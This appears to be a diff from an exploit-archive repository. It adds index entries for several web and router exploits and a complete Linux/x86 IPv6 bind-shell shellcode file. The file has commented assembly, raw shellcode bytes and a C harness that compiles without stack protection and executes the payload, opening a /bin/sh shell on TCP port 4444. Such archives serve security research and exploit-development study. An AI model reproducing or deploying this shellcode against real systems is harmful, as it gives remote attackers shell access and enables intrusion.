 45057,exploits/php/webapps/45057.txt,"MyBB New Threads Plugin 1.1 - Cross-Site Scripting",2018-07-19,0xB9,webapps,php,80
 45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php,
 45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,
+45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
+45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
+45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80

files_shellcodes.csv

@@ -896,3 +896,4 @@ id,file,description,date,author,type,platform
 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
 45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm
 45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
+45080,shellcodes/linux_x86/45080.c,"Linux/x86 - Bind (4444/TCP) Shell + IPv6 Shellcode (100 bytes)",2018-07-23,"Kartik Durg",shellcode,linux_x86

shellcodes/linux_x86/45080.c

@@ -0,0 +1,120 @@
+# Title: Linux/x86 - Bind (4444/TCP) Shell + IPv6 Shellcode (100 bytes)
+# Length : 100bytes
+# Author: Kartik Durg
+# Write-up Link: https://iamroot.blog/2018/07/17/0x1-shell_bind_tcp_ipv6-linux-x86/
+# Tested on: Ubuntu 16.0.4.1 (i686)
+
+/*
+global _start
+	section .text
+	
+	_start:
+	;References:
+	;(1)http://syscalls.kernelgrok.com/
+	;(2)https://www.3dbrew.org/wiki/Socket_Services
+	;(3)http://osr600doc.xinuos.com/en/SDK_netapi/sockC.TheIPv6sockaddrstructure.html
+	;(4)http://www.qnx.com/developers/docs/6.5.0/index.jsp?topic=%2Fcom.qnx.doc.neutrino_lib_ref%2Fi%2Finet6_proto.html
+	
+	;IPV6 socket creation
+	;int socketcall(int call, unsigned long *args);
+	;sockfd = socket(int socket_family, int socket_type, int protocol);
+	push byte 0x66 ; socketcall()
+	pop eax ;EAX=0x2
+	
+	xor ebx,ebx ; zero out ebx
+	
+	push 0x6 ; IPPROTO_TCP=6
+	push 0x1 ; socket_type=SOCK_STREAM (0x1)
+	push 0xa ; AF_INET6
+	inc ebx ; Define SYS_socket = 1
+	mov ecx,esp ; save pointer (ESP) to socket() args (ECX)
+	int 0x80
+	xchg esi,eax    ; host_sockfd stored in esi
+	xor eax,eax
+	
+	;int socketcall(int call, unsigned long *args);
+	;bind(host_sockfd, (struct sockaddr*) &host_addr, sizeof(host_addr));
+	push DWORD eax ;x4 dword ipv6 loopback | EAX contains 0
+	push DWORD eax
+	push DWORD eax
+	push DWORD eax
+	push eax ;sin6_addr = in6addr_any | in6addr_any=::0
+	push WORD 0x5c11 ;sin6_port=4444 | 0x5c11 | Configurable |
+	push WORD 0x0a ;AF_INET6
+	mov ecx,esp ;ECX holds pointer to struct sockaddr
+	push byte 0x1c ;sizeof(sockaddr_in6) | sockaddr_in6 = 28
+	push ecx ;pointer to host_sockfd
+	push esi ;host_sockfd
+	mov ecx,esp ;ECX points to args
+	inc ebx ;EBX = 0x2 | #define SYS_BIND 2
+	push byte 0x66 ;socketcall()
+	pop eax
+	int 80h
+	
+	;Listen
+	;int socketcall(int call, unsigned long *args);
+	;int listen(int host_sockfd, int backlog);
+	push ebx ;EBX=2 | backlog=2
+	push esi ;poiter to host_sockfd
+	mov ecx,esp ;ECX points to args
+	inc ebx
+	inc ebx ;EBX=0x4 | #define SYS_LISTEN 4
+	push byte 0x66
+	pop eax ;socketcall()
+	int 80h
+	
+	;Accept
+	;int socketcall(int call, unsigned long *args);
+	;accept(int sockfd, NULL, NULL);
+	cdq ;EDX = 0x0 | Saves a byte
+	push edx ;Push NULL
+	push edx ;Push NULL
+	push esi ;Push host_sockfd
+	mov ecx,esp ;ECX points to args
+	inc ebx ;EBX = 0x5 | #define SYS_ACCEPT 5
+	push byte 0x66 ;socketcall()
+	pop eax
+	int 80h
+	
+	xchg ebx,eax ;save client_sockfd
+	
+	push byte 0x2 ;push 0x2 on stack
+	pop ecx ;ECX = 2
+	
+	;dup2() to redirect stdin(0), stdout(1) and stderr(2)
+	loop:
+	push byte 0x3f ;dup2()
+	pop eax ;ECX = 0x3f
+	int 0x80 ;exec sys_dup2
+	dec ecx ;decrement counter
+	jns loop ;SF not set? then keep on jumping
+	
+	;execve(/bin//sh)
+	xor ecx,ecx ;clear ECX
+	push ecx ;Push NULL
+	push byte 0x0b ;execve() sys call number
+	pop eax ;EAX=0x2 | execve()
+	push 0x68732f2f ;(1)/bin//sh
+	push 0x6e69622f ;(2)/bin//sh
+	mov ebx,esp ;EBX pointing to "/bin//sh"
+	int 0x80 ;Calling Interrupt for sys call
+*/
+
+/*
+gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32
+
+./shellcode
+
+*/
+
+#include<stdio.h>
+ 
+unsigned char shellcode[] = \
+"\x6a\x66\x58\x31\xdb\x6a\x06\x6a\x01\x6a\x0a\x43\x89\xe1\xcd\x80\x96\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x53\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd\x80\x99\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+ 
+main()
+{
+	printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}